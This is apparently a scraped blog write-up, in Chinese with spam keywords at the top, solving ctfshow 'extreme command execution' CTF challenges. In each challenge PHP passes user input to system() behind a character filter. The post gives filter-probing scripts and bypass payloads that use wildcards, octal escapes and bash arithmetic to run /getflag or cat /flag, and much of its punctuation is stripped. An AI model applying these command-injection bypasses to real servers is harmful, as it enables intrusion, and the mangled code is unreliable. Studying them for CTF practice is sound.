长沙专业网站建设,门户网站建设存在的问题和差距,用php做的录入成绩的网站,胶南网《简单的命令执行题目》 这里感叹一下#xff0c;g4佬是真好厉害#xff0c;这次题目十分的难#xff0c;嗯#xff0c;对我这种菜鸡来说是这样的#xff0c;想了一天#xff0c;最后结束了#xff0c;也还是没有想明白第五题的解法#xff0c;我真是fw#xff0c;到最… 《简单的命令执行题目》 这里感叹一下g4佬是真好厉害这次题目十分的难嗯对我这种菜鸡来说是这样的想了一天最后结束了也还是没有想明白第五题的解法我真是fw到最后也只能解出4道。 目录
基础
题目
极限命令执行1
极限命令执行2
极限命令执行3
极限命令执行4 基础 在讲之前大家可以先了解了解一些基础。 首先关于这里看下面这篇文章 stackexchange的文章 因为是stackexchange的所以是要挂vpn的 然后下面这些文章也是可以看一下的文章 文章1 文章2 文章3 题目
极限命令执行1
?php
//本题灵感来自研究一直没做出来的某赛某题时想到的姿势太棒啦~。
//flag在根目录flag里或者直接运行根目录getflagerror_reporting(0);
highlight_file(__FILE__);if (isset($_POST[ctf_show])) {$ctfshow $_POST[ctf_show];if (!preg_match(/[b-zA-Z_#%^*:{}\-\\|;\[\]]/,$ctfshow)){system($ctfshow);}else{echo(????????);}
}
? 这里首先跑一下正则因为一些不知名原因直接显示不出来所有进行url加密以后去解密了。 ?phpfor ($a 0; $a 256; $a) {if (!preg_match(/[b-zA-Z_#%^*:{}\-\\|;\[\]]/,chr($a))){echo urlencode(chr($a)). ;}
} 这里我们就知道了有这些是可以使用这样我们就可以构造了。 因为题目提示环境是centos7因为centos7的环境是可以直接使用/执行文件的 payload1ctf_show/?????a?
payload2ctf_show/???/?a??64 /??a?
极限命令执行2
?php
//本题灵感来自研究一直没做出来的某赛某题时想到的姿势太棒啦~。
//flag在根目录flag里或者直接运行根目录getflagerror_reporting(0);
highlight_file(__FILE__);
include check.php;if (isset($_POST[ctf_show])) {$ctfshow $_POST[ctf_show];check($ctfshow);system($ctfshow);
}
? 里面是先经过check然后才进去system中的那时候没有注意还以为check是一个php自带函数查了半天之后才发现了include check.php哈哈哈 这里是一个过滤我们可以尝试尝试这里写一个脚本来跑正则。 import requests#这里填写自己的靶机网址
url http://40e404d6-3af3-401c-b11c-9e48298fd1ce.challenge.ctf.show/str
for i in range(255):data {ctf_show:chr(i)}retext requests.post(url,datadata).textif ?????? in retext:print(1)else:str chr(i)print(str)这里等1跑完了可以用的就出来了。这里有这些是可以使用的然后就是这么一些东西来进行命令执行。 #这个命令大家应该都比较熟悉的吧这个就是cat /etc/passwd的16进制
$(printf \x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64)#因为不能有字母和这里就要进行变形了
$\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64 但是这里出现一个问题就是他不能进行命令执行但是可以执行文件。 这里就是/getflag我里面写的就是echo 1但是现在有出现了一个问题就是有字母x不可以使用的但是别忘了还是有8进制的。 所以将16进制转换8进制就可以了 payload:ctf_show$\57\147\145\164\146\154\141\147
极限命令执行3 ?php
//本题灵感来自研究一直没做出来的某赛某题时想到的姿势太棒啦~。
//flag在根目录flag里error_reporting(0);
highlight_file(__FILE__);
include check.php;if (isset($_POST[ctf_show])) {$ctfshow $_POST[ctf_show];check($ctfshow);system($ctfshow);
}
? 这里还是老样子先跑跑正则。 !#$()01\_{}~ 这里跑出来是这些东西看到0和1的瞬间我就想到二进制一脸兴奋认为这题还是很简单的嘛然后现实给我狠狠一巴掌。 这里我们可以看到其实最多就可以解析三位多了不行之后就是在这里卡住了。 这里我卡了很久然后是一直没有想明白然后再第一天的下午突然想起来一个原码和补码的知识这里可以看ctfshow入门的57题。 这样就可以使用~()$这四个符号来构造任何数字了然后就有了第一代脚本。 a r\ 5 7 \ 1 4 7 \ 1 4 5 \ 1 6 4 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7b a.split( )
str
for i in b:if i ! \\:str $((~$(( $((~$(()))) * (int(i) 1) ))))else:str \\\\print($str) 但是这里发现并没有被执行然后多谢 谢队的提醒让我在进一步。 首先我们要知道shell中的单引号和双引号都有自己的意思这点和php、java之类的挺像的当然不包括python。 这里就不说了随便找了一篇文章自己可以看一下 文章 #上面脚本下面改成这样
print($\\str\\) 这里进了一步但是接下来就是如何进一步执行的问题了 然后这里可以使用$0来进行重定向来进一步执行考虑到部分人没有vpn这里截取一部分上面发的文章详细的自己进行查看然后$0是什么意思可以自行查看上面的文章。 或者可以可以这么理解 command string command 是 Shell 命令string 是字符串它只是一个普通的字符串并没有什么特别之处。将字符串通过标准输入传递给命令 #然后这里再次更改脚本print的输出的内容
print($0$\\str\\) 这里可以看到是执行/getflag的输出了1。 但是放到其中的时候还是不行因为我没有注意他是没有getflag的。 一脸兴奋到现实又给了我一巴掌。 然后就是尝试使用命令cat /flag但是提示没有这个文件额没了然后又是卡了很久。 最后才知道是要第二个重定向是要转义的哎不是很明白单引号要转义就算了第二次重定向还要转义。 #最终payload
# \ 1 4 3 \ 1 4 1 \ 1 6 4 \ 4 0 \ 5 7 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7 cat /flag
a r\ 1 4 3 \ 1 4 1 \ 1 6 4 \ 4 0 \ 5 7 \ 1 4 6 \ 1 5 4 \ 1 4 1 \ 1 4 7
b a.split( )
str
for i in b:if i ! \\:str $((~$(( $((~$(()))) * (int(i) 1) ))))else:str \\\\
print($0$0\\\\\\$\\str\\)
payload:ctf_show$0$0\\\$\\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\极限命令执行4
?php
//本题灵感来自研究一直没做出来的某赛某题时想到的姿势太棒啦~。
//flag在根目录flag里error_reporting(0);
highlight_file(__FILE__);
include check.php;if (isset($_POST[ctf_show])) {$ctfshow $_POST[ctf_show];check($ctfshow);system($ctfshow);
}
? 老样子使用python跑一下正则。 !#$()0\_{}~ 就比上面少一个1但是我也没有用到1呀所以用上面payload就可以了
